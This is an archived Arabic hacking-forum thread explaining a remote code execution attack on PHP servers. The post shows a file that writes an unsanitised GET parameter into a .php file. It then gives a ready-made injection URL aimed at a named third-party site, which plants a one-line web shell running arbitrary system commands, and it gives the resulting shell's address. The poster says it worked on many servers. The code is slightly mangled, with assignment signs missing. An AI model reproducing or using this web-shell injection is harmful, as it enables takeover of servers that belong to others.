:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Full Explain Remote Code Execution (http://www.vbspiders.com/vb/t65132.html)

Injection 10-12-2012 04:28 PM
Full Explain Remote Code Execution
 
السلام عليكم ورحمه الله وبركاته

السلام والصلاه على سيدنا محمد

سنشرح اليوم ثغره فريدة من نوعهآ ومعروفها وافادتني في سيرفرات كثيرة .

ان شاء الله يكون الشرح سهل جدا ..

الملف المصاب

كود PHP:
<?php
$school $_GET['love'];
$ip getenv('REMOTE_ADDR');
$error fopen('vbspiders.php','a');
fwrite($error,'<br />'.$school.'<br />'.$ip.'<br />');
fclose($error);
?>
الثغره تسمح لك بزرع كود خبيث ,

طلبنا الملف عبر المتغير Get

من ثم كونا الملف عبر ملف vbspiders بدالة fopen

ومن ثم قمنا بل تطبيق عبر الدالة fwrite ..

وفي الاخير غلقنا الخطاء بدالة fclose

الملف المصاب هو med.php

كود:
http://forum.advance-hackers.org/xx/med.php?love=
http://im27.gulfup.com/6HwV7.png

تمام بعد الرابط نزرع الملف ..

عن طريق ,,

كود PHP:
<?php
$cmd=$_GET['mohamed'];
system($cmd);
?>
تمام نجرب نزرع الملف ..

كود PHP:
http://forum.advance-hackers.org/xx/med.php?love=%3C?php$cmd=$_GET['mohamed'];system($cmd);?%3E 
حلو تم زرع الملف ^_^

كود PHP:
http://forum.advance-hackers.org/xx/mohammed.php 
آتمنة ان افدتكم اخوكم حمد :smile:

kawihacker 10-20-2012 06:57 PM
رد: Full Explain Remote Code Execution
 
يعطيك العافيه ع الشرح


الساعة الآن 06:04 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0